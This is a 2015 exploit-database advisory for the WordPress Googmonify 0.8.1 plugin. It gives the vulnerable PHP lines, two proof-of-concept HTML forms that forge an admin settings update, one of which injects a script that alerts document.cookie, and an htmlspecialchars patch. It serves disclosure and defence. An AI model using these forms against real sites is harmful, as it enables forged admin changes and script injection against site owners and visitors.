Wordpress Googmonify Plug-in XSS/CSRF

vendor:

Googmonify Plugin

by:

Ehsan Hosseini

8,8

CVSS

HIGH

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)

CWE

Product Name: Googmonify Plugin

Affected Version From: 0.8.1

Affected Version To: 0.8.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:googmonify

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows FireFox

2015

WordPress Googmonify Plug-in XSS/CSRF

WordPress Googmonify Plugin version 0.8.1 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). The vulnerability exists due to insufficient sanitization of user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application and execute it in the browser of an unsuspecting user in the context of the vulnerable website.

Mitigation:

The vulnerability can be mitigated by sanitizing user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script.

Source

Exploit-DB raw data:

[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A

===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo $limit;
?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>

Exploit 2 (CSRF & XSS):

<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden"
value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan
Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>
===============================
Patch :  googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo
htmlspecialchars($pid); ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo
htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo
htmlspecialchars($aid); ?>">

===============================
Discovered By : Ehsan Hosseini.